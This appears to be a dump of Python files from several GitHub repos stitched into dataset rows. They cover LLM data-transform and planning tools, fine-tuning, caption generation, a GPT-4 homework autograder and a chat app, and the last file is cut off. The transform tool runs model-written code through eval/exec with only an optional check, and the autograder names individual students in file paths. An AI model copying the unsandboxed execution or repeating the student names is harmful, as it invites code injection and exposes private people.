import importlib
import logging
from langchain import LLMChain, PromptTemplate
from caesura.database.database import Database, Table
from caesura.observations import Observation
from caesura.tools.base_tool import BaseTool
from caesura.observations import ExecutionError
from langchain.schema import SystemMessage, AIMessage, HumanMessage
from langchain.prompts.chat import HumanMessagePromptTemplate, ChatPromptTemplate, AIMessagePromptTemplate
logger = logging.getLogger(__name__)
IMPORTS = ["pandas", "datetime", "numpy", "re"]
IMPORT_REGEX = r"(from \w+ |)import (\w+)( as \w+|)"
class TransformTool(BaseTool):
name = "Python"
description = (
"Transform the values for a certain column using python. Can be used to transform dates, numbers etc, or to extract data from semi-structured documents. "
"Three input arguments: (column to transform; new name for the transformed column; natural language explanation of the python code to be executed). "
"For example: (date_of_birth; month_of_birth; extract the month from the dates) "
"Cannot deal columns of type IMAGE or TEXT. Cannot filter rows. Has only access to the libraries " + ",".join(IMPORTS) + ".\n"
)
args = ("column to transform", "new name for the transformed column", "natural language explanation of the python code to be executed")
def __init__(self, database: Database, llm, interactive: bool):
super().__init__(database)
self.llm = llm
self.interactive = interactive
def run(self, tables, input_args, output):
"""Use the tool."""
table = tables[0]
column, new_name, explanation = tuple(input_args)
if "." in column:
table, column = column.split(".")
ds = self.database.get_table_by_name(table)
if column in ds.image_columns:
raise ExecutionError(description="Python cannot be called on columns of IMAGE datatype. "
"For these columns, use the other tools, e.g. Visual Question Answering")
if column in ds.text_columns:
raise ExecutionError(description="Python cannot be called on columns of TEXT datatype. "
"For these columns, use the other tools, e.g. Text Question Answering.")
df, func_str = self.execute_python(ds, column, new_name, explanation)
result = Table(
output if output is not None else table, df,
f"Result of Python: table={table}, column={column}, new_column={new_name}, code={explanation}",
parent=ds
)
# Add the result to the working memory
observation = self.database.register_working_memory(result, peek=[new_name])
observation = Observation(description=observation, plan_step_info=func_str)
return observation
def execute_python(self, ds, column, new_name, explanation):
if column not in ds.data_frame.columns:
raise ExecutionError(description=f"Column {column} does not exist in table {ds.name}.")
chat_thread = []
i = 0
while True:
try:
func, dtype, func_str = self.get_func(explanation, ds.data_frame[column][:10],
chat_thread=chat_thread, column=column, new_column=new_name)
df = ds.data_frame.copy()
df[new_name] = df[column].apply(func).astype(dtype)
return df, func_str
except Exception as e:
if i >= 3:
raise ExecutionError(description="Python tool failed. Use another tool!")
chat_thread = self.handle_errors(chat_thread=chat_thread, error=e, request=explanation)
i += 1
def get_func(self, explanation, data, chat_thread, column, new_column):
modules = ", ".join(IMPORTS)
params = dict(explanation=explanation, data=str(data), modules=modules, column=column, new_column=new_column)
if len(chat_thread) == 0: # Start of conversation
chat_thread.append(
HumanMessagePromptTemplate.from_template(
"{explanation}:\n```py\n>>> print({column}[:10])\n{data}\n```\n"
"It is a pandas Series object. Please call the 'apply' method with a lambda expression, "
"and make sure to always call astype() in the same line. Assign the result to a variable called '{new_column}'. "
"Template to use: `{new_column} = {column}.apply(lambda x: <code>).astype(<dtype>)`. You can use {modules}."
).format(**params))
prompt = ChatPromptTemplate.from_messages(chat_thread)
chain = LLMChain(llm=self.llm, prompt=prompt)
result = chain.predict().strip()
chat_thread.append(AIMessage(content=result))
match = re.search(fr"{new_column} = (\w+\[\"|\w+\['|){column}(\"\]|'\]|)\.apply\((.*)\)\.astype\((.*)\)", result)
if match is None:
raise ValueError(f"Use correct template: `{new_column} = {column}.apply(lambda x: <code>).astype(<dtype>)`")
code, dtype = match[3], match[4]
functions = self.parse_function_definitions(result)
function_str = "\n".join(functions)
function_str = f"{function_str}{column}.apply({code}).astype({dtype})"
if self.interactive and not next(iter(
input(f"\nSecurity-Check: Is >>> {function_str} <<< fine (Y,n) ? > ")
), "y").lower() == "y":
exit(0)
loc = self.manage_imports(result, functions)
func = eval(code, loc) # get function handler
dtype = eval(dtype, loc)
return func, dtype, function_str
def parse_function_definitions(self, result):
functions = list()
for m in re.finditer(r"( *)def (\w+)\(.*\):.*(\n\1 .*)+", result):
indent = len(m[1])
func = "\n".join(l[indent:] for l in m[0].split("\n"))
if not re.search(IMPORT_REGEX, func):
functions.append(func + "\n")
return functions
def manage_imports(self, result, functions):
if "```" in result:
result = result.split("```")[1]
loc = {m: importlib.import_module(m) for m in IMPORTS}
for from_stmt, module, alias in re.findall(IMPORT_REGEX, result):
from_stmt = [x for x in from_stmt[5:].strip().split(".") if x]
alias = alias[4:].strip() or module
module = from_stmt + [module]
target = loc[module[0]]
for m in module[1:]:
target = getattr(target, m)
loc[alias] = target
for f in functions:
exec(f, loc)
return loc
def handle_errors(self, chat_thread, error, request):
error_str = f"{type(error).__name__}({error})"
code = re.search(fr"\w+ = (\w+\[\"|\w+\['|)\w+(\"\]|'\]|)\.apply\((.*)\)\.astype\((.*)\)", chat_thread[-1].content)
code = code[0] if code is not None else "<could not parse code with template>"
prompt = ChatPromptTemplate.from_messages([
*chat_thread,
HumanMessagePromptTemplate.from_template(
"Something went wrong executing `{code}`. This is the error I got: {error}. "
"Can you answer me these four questions:\n"
"1. What is the reason for the error?\n"
"2. Is there another way to '{request}', potentially using another library (from {libraries})?\n."
"3. Can this be fixed? Or is there something wrong in my request? Answer 'Yes' if it can be fixed, and 'No' otherwise.\n"
"4. If it can be fixed, how can it be fixed? If it cannot be fixed, please explain the error and why it cannot be implemented using python.\n"
"5. Write fixed code, if possible."
),
AIMessage(content="I'm sorry that the executed code failed. Here are the answers to the questions:\n1.")
])
libraries = ", ".join(IMPORTS)
chain = LLMChain(llm=self.llm, prompt=prompt)
logger.warning(prompt.format(error=error_str, code=code, libraries=libraries, request=request))
result = chain.predict(error=error_str, code=code, libraries=libraries, request=request, stop=["\n5."])
logger.warning(result)
explanation, _, can_be_fixed, description = \
tuple(x.strip() for x in re.split(r"(\n2\.|\n3\.|\n4\.)", result)[slice(0, None, 2)])
can_be_fixed = "yes" in re.split(r"\W", can_be_fixed.lower())
if "```" in description:
description = description.split("```")[0]
description = ".".join(description.split(".")[:-1]) + "."
if not can_be_fixed:
raise ExecutionError(description=description, original_error=error)
prompt = ChatPromptTemplate.from_messages([
*chat_thread,
HumanMessagePromptTemplate.from_template(
"Something went wrong executing `{code}`. This is the error I got: {error}. "
"{explanation} Please fix it, but make sure you adhere to the template! This is how you could do it: {fix_idea}"
),
]).format_prompt(error=error_str, code=code, explanation=explanation, fix_idea=description)
return prompt.messages
| [
"Something went wrong executing `{code}`. This is the error I got: {error}. {explanation} Please fix it, but make sure you adhere to the template! This is how you could do it: {fix_idea}",
"3. Can this be fixed? Or is there something wrong in my request? Answer 'Yes' if it can be fixed, and 'No' otherwise.\n",
"I'm sorry that the executed code failed. Here are the answers to the questions:\n1.",
"1. What is the reason for the error?\n",
"Can you answer me these four questions:\n",
"4. If it can be fixed, how can it be fixed? If it cannot be fixed, please explain the error and why it cannot be implemented using python.\n",
"Something went wrong executing `{code}`. This is the error I got: {error}. ",
"2. Is there another way to '{request}', potentially using another library (from {libraries})?\n.",
"{explanation} Please fix it, but make sure you adhere to the template! This is how you could do it: {fix_idea}",
"5. Write fixed code, if possible.",
"Something went wrong executing `{code}`. This is the error I got: {error}. Can you answer me these four questions:\n1. What is the reason for the error?\n2. Is there another way to '{request}', potentially using another library (from {libraries})?\n.3. Can this be fixed? Or is there something wrong in my request? Answer 'Yes' if it can be fixed, and 'No' otherwise.\n4. If it can be fixed, how can it be fixed? If it cannot be fixed, please explain the error and why it cannot be implemented using python.\n5. Write fixed code, if possible."
] |
2024-01-10 | DataManagementLab/caesura | caesura~phases~planning.py | import logging
import re
from langchain import LLMChain
from caesura.capabilities import ALL_CAPABILITIES
from langchain.schema import AIMessage
from langchain.prompts.chat import HumanMessagePromptTemplate, ChatPromptTemplate, AIMessagePromptTemplate, SystemMessagePromptTemplate
from caesura.phases.base_phase import ExecutionOutput, Phase
from caesura.phases.discovery import DiscoveryPhase
from caesura.observations import ExecutionError
from caesura.plan import Plan, PlanStep
logger = logging.getLogger(__name__)
INIT_PROMPT = "My request is: {query}. {relevant_columns}."
REINIT_PROMPT = "{relevant_columns} Take these updated relevant values into account when fixing the error!"
EXAMPLE_PLAN = """
Example plan for database containing 'patient' and 'patient_reports' tables:
Request: Plot the average patient age for each diagnosis.
Step 1: Join the 'patient' and the 'patient_reports' table on the 'patient_id' column to combine the two tables.
Input: patient, patient_reports
Output: joined_patient_table
New Columns: N/A
Step 2: Extract the diagnosis for each patient from the 'report' column in the 'joined_patient_table' table.
Input: joined_patient_table
Output: N/A
New Columns: diagnosis
Step 3: Group the 'joined_patient_table' by diagnosis and aggregate the 'age' column using the mean.
Input: joined_patient_table
Output: result_table
New Columns: mean_age
Step 4: Plot the 'result_table' in a bar plot. The 'diagnosis' should be on the X-axis and the 'mean_age' on the Y-Axis.
Input result_table
Output: N/A
New Columns: N/A
Step 5: Plan completed.
Example plan for database containing 'pictures' and a 'metadata' table:
Request: Get the number of pictures that depict a skateboard per epoch.
Step 1: Select all rows of the 'pictures' table where the 'image' column depicts a skateboard.
Input: pictures
Output: skateboard_pictures
New Columns: N/A
Step 2: Join the 'pictures' and the 'metadata' tables on the 'picture_path' column.
Input: pictures, metadata
Output: joined_table
New Columns: N/A
Step 3: Group by the 'epoch' column and count the number of rows.
Input: joined_table
Output: result
New Columns: num_pictures
Step 4: Plan completed.
Example plan for database containing tables 'building' and 'surveillance':
Request: Construct a table containing the highest number of persons depicted in a surveillance image per building.
Step 1: Join the 'building' table with the 'surveillance' table on the 'building_id' column.
Input: building, surveillance
Output: joined_table
New Columns: N/A
Step 2: Extract the number of depicted persons for each image in the 'image' column of the 'joined_table' table.
Input: joined_table
Output: N/A
New Columns: num_depicted_persons
Step 3: Group the 'joined_table' table by 'building_name' and aggregate the 'num_depicted_persons' column using the maximum.
Input: joined_table
Output: final_result
New Columns: max_num_depicted_persons
Step 5: Plan completed.
Example plan for chess database for a chess tournament. It has two tables 'chess_game_reports' and 'participating_players'.
Request: What is the highest number of moves in a chess game for each player.
Step 1: Join the 'chess_game_reports' and the 'participating_players' on the 'player_id' column.
Input: chess_game_reports, participating_players
Output: joined_table
New Columns: N/A
Step 2: Extract the number of moves from the chess game reports.
Input: joined_table
Output: N/A
New Columns: num_moves
Step 3: Group by 'player_name' and compute the maximum of 'num_moves'.
Input: joined_table
Output: result_table
New Columns: max_num_moves
Step 4: Plan completed.
"""
class PlanningPhase(Phase):
def create_prompt(self):
result = ChatPromptTemplate.from_messages([
self.system_prompt(),
HumanMessagePromptTemplate.from_template(INIT_PROMPT),
AIMessagePromptTemplate.from_template("Request: {query}\nThought:")
])
return result
def system_prompt(self):
result = "You are Data-GPT and you generate plans to retrieve data from databases:\n"
result += EXAMPLE_PLAN + "\n\n"
result += self.database.describe()
result += "You have the following capabilities:\n"
result += "\n".join([c.description for c in ALL_CAPABILITIES])
result += "\n" + FORMAT_INSTRUCTIONS
return SystemMessagePromptTemplate.from_template(result)
def init_chat(self, query, relevant_columns, **kwargs):
return self.create_prompt().format_prompt(query=query, relevant_columns=relevant_columns.with_join_hints()).messages
def execute(self, chat_history, **kwargs):
prompt = ChatPromptTemplate.from_messages(chat_history)
llm_chain = LLMChain(llm=self.llm, prompt=prompt)
ai_output = llm_chain.predict()
chat_history += [AIMessage(content=ai_output)]
plan = self.parse_plan(ai_output)
logger.info(plan)
return ExecutionOutput(
state_update={"plan": plan},
chat_history=chat_history,
)
def handle_observation(self, observation, chat_history, **kwargs):
msg = observation.get_message(suffix= \
"\nTo systematically fix this issue, answer the following questions one by one:\n"
"1. What are potential causes for this error? Think step by step.\n"
"2. Explain in detail how this error could be fixed.\n"
"3. Are there additional relevant columns necessary to fix the error(Yes / No)?\n"
)
prompt = ChatPromptTemplate.from_messages(chat_history + [msg])
chain = LLMChain(llm=self.llm, prompt=prompt)
answers = chain.predict()
logger.warning(observation)
logger.warning(answers)
_, fix_idea, additional_cols_str = \
[x.strip() for x in re.split(r"(^1\.|\n2\.|\n3\.)", answers)[slice(2, None, 2)]]
additional_cols = "yes" in re.split(r"\W", additional_cols_str.lower())
if additional_cols:
which_info = re.search(r"(^|\W)((Y|y)es)\W+(\w.+)\W", additional_cols_str)[4].strip(" .")
raise ExecutionError(description=f"This information is missing: {which_info}",
target_phase=DiscoveryPhase)
observation.set_fix_idea(fix_idea)
chat_history.append(observation.get_message(suffix="\nPlease come up with a fixed plan."))
return chat_history
def reinit_chat(self, observation, chat_history, query, relevant_columns, **kwargs):
chat_history.append(observation.get_message(suffix="\nPlease come up with a fixed plan."))
chat_history.append(HumanMessagePromptTemplate.from_template(REINIT_PROMPT))
chat_history = ChatPromptTemplate.from_messages(chat_history).format_prompt(
relevant_columns=relevant_columns.with_join_hints()
).messages
return chat_history
def parse_plan(self, plan):
available_tables = set(self.database.tables.keys())
result = []
plan = plan.split("\n")
current_step = None
for step in plan:
if step.startswith("Step"):
if current_step is not None:
result.append(current_step)
step_str = ":".join(step.split(":")[1:]).strip()
current_step = PlanStep(step_str, available_tables=available_tables)
if step.startswith("Input"):
step_str = ":".join(step.split(":")[1:]).strip()
current_step.set_input(step_str.split(","))
if step.startswith("Output"):
step_str = ":".join(step.split(":")[1:]).strip()
if step_str != "N/A":
current_step.set_output(step_str)
available_tables.add(step_str)
if step.startswith("New Columns"):
step_str = ":".join(step.split(":")[1:]).strip()
if step_str != "N/A":
current_step.set_new_columns(step_str.split(","))
if current_step is not None and current_step.input_tables != []:
result.append(current_step)
result = self.filter_steps(result)
return Plan(result)
def filter_steps(self, steps):
forbidden = {"verify", "make sure", "confirm", "test", "validate", "if", "in case", "double-check", "check"}
steps = [
s for s in steps
if not any(s.description.lower().startswith(prefix) for prefix in forbidden) and len(s.input_tables) > 0
]
return steps
FORMAT_INSTRUCTIONS = """
Use the following format:
Request: The user request you must satisfy by using your capabilities
Thought: You should always think what to do.
Step 1: Description of the step.
Input: List of tables passed as input. Usually this is a single table, except when tables need to be combined using a join.
Output: Name of the output table. N/A if there is no output e.g. when plotting.
New Columns: The new columns that have been added to the dataset. N/A if no column has been added.
... (this Step/Input/Output/New Columns can repeat N times)
Step N: Plan completed.
""" | [
"My request is: {query}. {relevant_columns}.",
"{relevant_columns} Take these updated relevant values into account when fixing the error!",
"Request: {query}\nThought:"
] |
2024-01-10 | virtualdude1/PlotGenerator | finetune.py | import requests
import openai
from pprint import pprint
with open('openaiapikey.txt', 'r') as infile:
open_ai_api_key = infile.read()
openai.api_key = open_ai_api_key
def file_upload(filename, purpose='fine-tune'):
resp = openai.File.create(purpose=purpose, file=open(filename))
pprint(resp)
return resp
def file_list():
resp = openai.File.list()
pprint(resp)
def finetune_model(fileid, suffix, model='davinci'):
header = {'Content-Type': 'application/json', 'Authorization': 'Bearer %s' % open_ai_api_key}
payload = {'training_file': fileid, 'model': model, 'suffix': suffix}
resp = requests.request(method='POST', url='https://api.openai.com/v1/fine-tunes', json=payload, headers=header, timeout=45)
pprint(resp.json())
def finetune_list():
header = {'Content-Type': 'application/json', 'Authorization': 'Bearer %s' % open_ai_api_key}
resp = requests.request(method='GET', url='https://api.openai.com/v1/fine-tunes', headers=header, timeout=45)
pprint(resp.json())
def finetune_events(ftid):
header = {'Content-Type': 'application/json', 'Authorization': 'Bearer %s' % open_ai_api_key}
resp = requests.request(method='GET', url='https://api.openai.com/v1/fine-tunes/%s/events' % ftid, headers=header, timeout=45)
pprint(resp.json())
def finetune_get(ftid):
header = {'Content-Type': 'application/json', 'Authorization': 'Bearer %s' % open_ai_api_key}
resp = requests.request(method='GET', url='https://api.openai.com/v1/fine-tunes/%s' % ftid, headers=header, timeout=45)
pprint(resp.json())
#resp = file_upload('synopses.jsonl')
#finetune_model(resp['id'], 'synopses', 'davinci')
finetune_list()
#openai.FineTune.cancel("ft-2ZxHjUVe5DpqK2EsYyA0YtKz") | [] |
2024-01-10 | wiiiktor/resume | script-1-Graphic-captions.py | import os
import docx
from dotenv import load_dotenv, find_dotenv
from pprint import pprint
from langchain.chat_models import ChatOpenAI
from langchain.prompts import PromptTemplate
from langchain.chains.llm import LLMChain
load_dotenv(find_dotenv())
def read_docx(filename: str) -> str:
"""Reads a DOCX file and returns its content as a string."""
doc = docx.Document(filename)
return '\n'.join(para.text for para in doc.paragraphs)
def get_files_from_dir(dir_path: str) -> list:
"""Returns a list of files in a given directory."""
return [os.path.join(dir_path, file_path) for file_path in os.listdir(dir_path) if
os.path.isfile(os.path.join(dir_path, file_path))]
def main():
DOCX_PATH = 'data/'
list_of_files = get_files_from_dir(DOCX_PATH)
chat = ChatOpenAI(temperature=0, model_name="gpt-4", max_tokens=700)
text = read_docx(list_of_files[0])
num_graphics = text.count("graphic-number")
template = """
In a document you will find {num_graphics} codes in a format
graphic-number-xxx where xxx are three integers.
For example graphic-number-003.
Your aim is to make a brief summary of the text around the codes,
especially in a paragraph just before the text.
You provide a reply in a format:
("graphic-number-001": "description to the graphic")
Document: {document}
"""
prompt = PromptTemplate(
input_variables=["num_graphics", "document"],
template=template
)
chain = LLMChain(llm=chat, prompt=prompt)
captions = chain.run(document=text, num_graphics=num_graphics)
pprint(captions, width=150)
if __name__ == "__main__":
main()
'''
example output:
('("graphic-number-001": "This graphic likely illustrates the tools needed for the installation process, as it is mentioned after the list of required tools.")\n'
'("graphic-number-002": "This graphic likely shows how to position the bike for the installation process, as it is mentioned in the context of positioning the bike with wheels upwards.")\n'
'("graphic-number-003": "This graphic likely demonstrates the process of removing front cranks from the bike, as it is mentioned in the context of crank and front derailleur removal.")\n'
'("graphic-number-004": "This graphic likely shows the bottom bracket that comes with the GTRO, as it is mentioned in the context of bottom bracket replacement.")\n'
'("graphic-number-005": "This graphic likely shows the positioning of the wave-spring in the bottom bracket’s niche, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-006": "This graphic likely shows the positioning of the wave-spring in the bottom bracket’s niche, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-007": "This graphic likely shows the positioning of the reaction lever on the chainstay, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-008": "This graphic likely shows the correct positioning of the lever against the straight area of the chainstay or kickstand plate, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-009": "This graphic likely shows the incorrect positioning of the lever against the edge of the kickstand’s plate, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-010": "This graphic likely shows the incorrect positioning of the lever against the edge of the kickstand’s plate, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-011": "This graphic likely shows the correct positioning of the shifting cable against the down tube, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-012": "This graphic likely shows the correct positioning of the reaction lever against the chainstay, as it is mentioned in the context of gearbox installation.")\n'
'("graphic-number-013": "This graphic likely shows the installation of the cable-slider, as it is mentioned in the context of cable-slider installation.")\n'
'("graphic-number-014": "This graphic likely shows the installation of the GTRO’s shifter on the handlebar, as it is mentioned in the context of shifter installation.")\n'
'("graphic-number-015": "This graphic likely shows the installation of the GTRO’s shifter on the handlebar, as it is mentioned in the context of shifter installation.")\n'
'("graphic-number-016": "This graphic likely shows the installation of the GTRO’s shifter on the handlebar, as it is mentioned in the context of shifter installation.")\n'
'("graphic-number-017": "This graphic likely shows the installation of the lever to the pedal boom for bicycles with no chainstay, as it is mentioned in the context of no-chainstay bicycles.")\n'
'("graphic-number-018": "This graphic likely shows the application of grease under the plastic cap of the crank bolt for usage in wet/humid areas, as it is mentioned in the context of GTRO usage in highly wet/humid area.")\n'
'("graphic-number-019": "This graphic likely shows the installation of bolts for the adapter, as it is mentioned in the context of adapter for beltring or larger chainring.")')
'''
| [
"num_graphics",
"description to the graphic",
"\n In a document you will find {num_graphics} codes in a format \n graphic-number-xxx where xxx are three integers.\n For example graphic-number-003.\n Your aim is to make a brief summary of the text around the codes, \n especially in a paragraph just before the text.\n You provide a reply in a format:\n (\"graphic-number-001\": \"description to the graphic\")\n\n Document: {document}\n ",
"graphic-number-001",
"document"
] |
2024-01-10 | weizhenFrank/AutoGrader | autograder.py | import openai
import os
import zipfile
import csv
import tqdm
import time
import re
# Initialize GPT-4 API
import os
openai.api_key = os.getenv('OPENAI_API_KEY')
# [Update your standard answers here]
FREQ = 30
assignment_answers = {
"layers.py": """
TODO1:
pad = conv_param['pad']
stride = conv_param['stride']
N, C, H, W = x.shape
F, _, HH, WW = w.shape
H_filter = (H + 2*pad - HH)/stride + 1
W_filter = (W + 2*pad - WW)/stride + 1
out = np.zeros((N, F, H_filter, W_filter))
x = np.pad(x, pad_width=((0,), (0,), (pad,), (pad,)), mode='constant', constant_values=0)
for i in range(N):
for z in range(F):
for j in range(H_filter):
for k in range(W_filter):
out[i,z,j,k] = np.sum(x[i,:,j*stride:(j*stride+HH),k*stride:(k*stride+WW)]*w[z,:,:,:])+b[z]
TODO2:
N, C, H, W = x.shape
pool_H = pool_param['pool_height']
pool_W = pool_param['pool_width']
stride = pool_param['stride']
H_filter = (H-pool_H)/stride + 1
W_filter = (W-pool_W)/stride + 1
out = np.zeros((N,C,H_filter,W_filter))
for j in range(H_filter):
for k in range(W_filter):
out[:,:,j,k] = x[:,:,j*stride:(j*stride+pool_H),k*stride:(k*stride+pool_W)].max(axis=(2,3))
"""
}
def student_already_graded(student_name, results_csv):
with open(results_csv, mode='r', newline='') as file:
reader = csv.reader(file)
for row in reader:
if row and student_name in row[0]:
return True
return False
def grade_assignment_per_file(student_answer, standard_answer, section_name, point=2.5):
format = {'layers.py':f"TODO1: 2.5/{point}, Correct; TODO2: 1/{point}, reason: ...; ",
}
messages = [
{"role": "system", "content": "You are a helpful grading assistant."},
{
"role": "user",
"content": f"Grade the following answers for {section_name}:\n (Standard Answer): {standard_answer}\n(Student's Answer): {student_answer}. \n \n \n You should compare each todo's answer correspondingly. In student's the python file, the TODO part (the answer) is enclosed by green hash symbols (###). As long as it's implemented correctly, no need to exactly match standard answer. Each TODO is {point}. \n \n \n Strictly follow this output format. Output format:{format[section_name]} \n \n \n Section Score: \n"
}
]
for num in range(3):
if num == 0:
response = openai.ChatCompletion.create(
model="gpt-4",
messages=messages
)
else:
response = openai.ChatCompletion.create(
model="gpt-4",
messages=messages,
temperature=0.3/num,
)
raw_feedback = response['choices'][0]['message']['content'].strip()
match = re.search(r"Section Score: (\d+)/(\d+)", raw_feedback)
if match:
# Convert score to float
final_score = float(match.group(1))
return final_score, raw_feedback
else:
print("Retrying due to missing section score...")
time.sleep(10)
raise Exception("Unable to get section score after multiple attempts")
files_path = {"layers.py":"lib/layers.py",
}
def read_python_file(file_path):
with open(file_path, 'r') as f:
return f.read()
def grade_assignment(student_folder, file_name, standard_answer):
file_path = os.path.join(student_folder, files_path[file_name])
student_answer = read_python_file(file_path)
score, feedback = grade_assignment_per_file(student_answer, standard_answer, file_name)
return score, feedback
# Directory containing all the zip files
zip_dir = "./zip"
# Directory to extract zip files
extract_dir = "./unzip"
os.makedirs(extract_dir, exist_ok=True)
# CSV file to store results
results_csv = "grading_results.csv"
error_studens = []
# Open CSV file and write header
with open(results_csv, mode='a', newline='') as file: # mode='a' to append to existing file
writer = csv.writer(file)
# Check if file is empty and write header if it is
if os.path.getsize(results_csv) == 0:
writer.writerow(["Student Name", "Total Score", "Feedback"])
# Loop through all zip files in directory
for zip_file_name in tqdm.tqdm(os.listdir(zip_dir)):
if zip_file_name.endswith(".zip"):
# Extract student name from zip file name
student_name = zip_file_name.split('-')[2]
# Check if student has already been graded
if student_already_graded(student_name, results_csv):
print(f"{student_name} has already been graded. Skipping...")
continue
try: # Add error handling
now = time.time()
# Path to store extracted files for this student
student_extract_dir = os.path.join(extract_dir, student_name)
print("---"*20)
print(f"Grading {student_name}")
# Extract zip file
with zipfile.ZipFile(os.path.join(zip_dir, zip_file_name), 'r') as zip_ref:
zip_ref.extractall(student_extract_dir)
if student_name == " Krishna Chaitanya Pulipati ":
student_extract_dir = '//Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Krishna Chaitanya Pulipati /assignment5'
if student_name == " Minoo Jafarlou ":
student_extract_dir = '/Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Minoo Jafarlou /assignment5'
if student_name == " Ranjit Singh Kanwar ":
student_extract_dir = '/Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Ranjit Singh Kanwar /assignment5'
if student_name == " Sri Harsha Seelamneni ":
student_extract_dir = '/Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Sri Harsha Seelamneni /assignment5/assignment5'
if student_name == " Sumanth Meenan Kanneti ":
student_extract_dir = '/Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Sumanth Meenan Kanneti /Sumanth_Meenan_ass5'
if student_name == " Saloni Ajgaonkar ":
student_extract_dir = '/Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Saloni Ajgaonkar /assignment5'
if student_name == " Meghana Puli ":
student_extract_dir = '/Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Meghana Puli /assignment5)'
if student_name == " Tharun Kumar Bandaru ":
student_extract_dir = '/Users/weizhenliu/Desktop/school/TA/DL/grading/HW5/unzip/ Tharun Kumar Bandaru /Assignment_5'
total_score = 0
all_feedback = []
ans = {'layers.py':5}
for file_name in assignment_answers.keys():
score, feedback = grade_assignment(student_extract_dir, file_name, assignment_answers[file_name])
total_score += score
all_feedback.append(file_name+':'+feedback)
print(f"{file_name}:{score}/{ans[file_name]}\n{feedback}\n")
print(f"Total Score: {total_score}")
print(f"Time taken for {student_name}: {time.time() - now} seconds\n")
print("---"*20)
writer.writerow([student_name, total_score, all_feedback])
time.sleep(FREQ)
except Exception as e: # Handle errors and continue
print(f"An error occurred while grading {student_name}: {str(e)}")
error_studens.append(student_name)
print("Continuing with next student...\n")
print("Done grading all students! Exceptions occurred for the following students:")
print(error_studens)
| [
"You are a helpful grading assistant."
] |
2024-01-10 | ddoddii/resume-ai-chat | inference~pipeline.py | import yaml
import os
import pathlib
from .openai_wrapper import OpenAIChat
class pipelines:
def __init__(self, foundation_model):
self.chat = OpenAIChat(model_name=foundation_model)
self.prompts_path = os.path.join(
os.path.dirname(pathlib.Path(__file__)), "prompts/"
)
with open(
os.path.join(self.prompts_path, "perQ_gen.yaml"), "r", encoding="UTF-8"
) as file:
data = yaml.load(file, Loader=yaml.FullLoader)
self.perQ_gen_prompt = data
with open(
os.path.join(self.prompts_path, "perQ_eval.yaml"), "r", encoding="UTF-8"
) as file:
data = yaml.load(file, Loader=yaml.FullLoader)
self.perQ_eval_prompt = data
with open(
os.path.join(self.prompts_path, "techQ_eval.yaml"), "r", encoding="UTF-8"
) as file:
data = yaml.load(file, Loader=yaml.FullLoader)
self.techQ_eval_prompt = data
with open(
os.path.join(self.prompts_path, "behavQ_eval.yaml"), "r", encoding="UTF-8"
) as file:
data = yaml.load(file, Loader=yaml.FullLoader)
self.behavQ_eval_prompt = data
async def _q_gen(self, position, cv):
if position == "ai":
position = "AI/ML Engineer"
elif position == "be":
position = "Backend Developer"
elif position == "fe":
position = "Frontend Developer"
elif position == "mobile":
position = "Mobile Developer"
messages_list = [
{"role": "system", "content": self.perQ_gen_prompt["system"]},
{
"role": "user",
"content": self.perQ_gen_prompt["user"].format(
position=position, cv=cv
),
},
]
return await self.chat.async_run(messages_list)
async def _a_eval(self, type, question, answer, criteria):
if type == "behavQ":
messages_list = [
{"role": "system", "content": self.behavQ_eval_prompt["system"]},
{
"role": "user",
"content": self.behavQ_eval_prompt["user"].format(
question=question, answer=answer, criteria=criteria
),
},
]
elif type == "techQ":
messages_list = [
{"role": "system", "content": self.techQ_eval_prompt["system"]},
{
"role": "user",
"content": self.techQ_eval_prompt["user"].format(
question=question, answer=answer, criteria=criteria
),
},
]
elif type == "perQ":
messages_list = [
{"role": "system", "content": self.perQ_eval_prompt["system"]},
{
"role": "user",
"content": self.perQ_eval_prompt["user"].format(
question=question, answer=answer, criteria=criteria
),
},
]
else:
assert "ERROR : type should be one of behavQ, techQ, perQ"
# print(messages_list)
return await self.chat.async_run(messages_list)
async def q_gen(self, cv, position):
self.response, self.token = await self._q_gen(position=position, cv=cv)
return self.response, self.token
async def a_eval(self, type, question, answer, criteria):
self.response, self.token = await self._a_eval(
type=type, question=question, answer=answer, criteria=criteria
)
return self.response, self.token
| [] |
2024-01-10 | antlatt/chat_antlatt_com | app2.py | import streamlit as st
import datetime
import time
from langchain.llms.ollama import Ollama
from langchain.chat_models import ChatOllama
import langchain.document_loaders
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.embeddings.gpt4all import GPT4AllEmbeddings
from langchain.vectorstores.chroma import Chroma
from langchain.chains import RetrievalQA
from langchain.cache import InMemoryCache
from langchain.globals import set_llm_cache
from streamlit_extras.add_vertical_space import add_vertical_space
from PyPDF2 import PdfReader
from langchain.memory.chat_message_histories.in_memory import ChatMessageHistory
from langchain.schema import messages_from_dict, messages_to_dict
from langchain.memory import ConversationBufferMemory
from langchain.chains import ConversationalRetrievalChain, ConversationChain
from langchain.agents.initialize import initialize_agent
from langchain.agents.agent_types import AgentType
from langchain.tools import Tool
from langchain.tools import BaseTool
from langchain.tools.ddg_search import DuckDuckGoSearchRun
from langchain.tools.wikipedia.tool import WikipediaQueryRun
from langchain.utilities.wikipedia import WikipediaAPIWrapper
import langchain
ollama = ChatOllama(base_url='http://192.168.1.81:11434', model='dolphin2.2-mistral', temperature=0.1, streaming=True)
set_llm_cache(InMemoryCache())
### CREATE VECTORSTORE FUNCTION
def db_lookup():
try:
if url is not None:
loader = langchain.document_loaders.WebBaseLoader(url)
documents = loader.load()
len(documents)
text_splitter = RecursiveCharacterTextSplitter(chunk_size=1000, chunk_overlap=50)
texts = text_splitter.split_documents(documents)
len(texts)
persist_directory = "./vectorstores/db/"
embeddings = GPT4AllEmbeddings()
vectordb = Chroma.from_documents(documents=texts, embedding=embeddings, persist_directory=persist_directory)
